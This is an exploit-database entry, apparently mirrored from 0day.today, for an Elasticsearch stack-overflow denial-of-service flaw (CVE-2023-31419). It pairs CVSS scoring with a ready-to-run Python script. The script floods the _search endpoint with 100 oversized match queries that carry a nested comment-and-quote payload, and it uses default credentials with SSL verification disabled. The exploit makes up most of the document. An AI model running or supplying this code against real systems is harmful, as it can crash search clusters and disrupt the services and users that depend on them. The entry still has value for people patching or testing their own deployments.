Lucene search

K
zdtTouhami Kasbaoui1337DAY-ID-39315
HistoryFeb 11, 2024 - 12:00 a.m.

Elasticsearch - StackOverflow DoS Exploit

2024-02-1100:00:00
Touhami Kasbaoui
0day.today
260
elasticsearch
dos
exploit
cve-2023-31419
ubuntu
20.04

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

AI Score

7

Confidence

Low

EPSS

0.001

Percentile

50.7%

# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://elastic.co/
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419

import requests
import random
import string

es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
index_name = '*'

payload = "/*" * 10000 + "\\" +"'" * 999

verify_ssl = False

username = 'elastic'
password = 'changeme'

auth = (username, password)

num_queries = 100

for _ in range(num_queries):
    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
    search_query = {
        "query": {
            "match": {
                "message": (symbols * 9000) + payload
            }
        }
    }

    print(f"Query {_ + 1} - Search Query:")

    search_endpoint = f'{es_url}/{index_name}/_search'
    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)

    if response.status_code == 200:
        search_results = response.json()

        print(f"Query {_ + 1} - Response:")
        print(search_results)

        total_hits = search_results['hits']['total']['value']
        print(f"Query {_ + 1}: Total hits: {total_hits}")

        for hit in search_results['hits']['hits']:
            source_data = hit['_source']
            print("Payload result: {search_results}")
    else:
        print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

AI Score

7

Confidence

Low

EPSS

0.001

Percentile

50.7%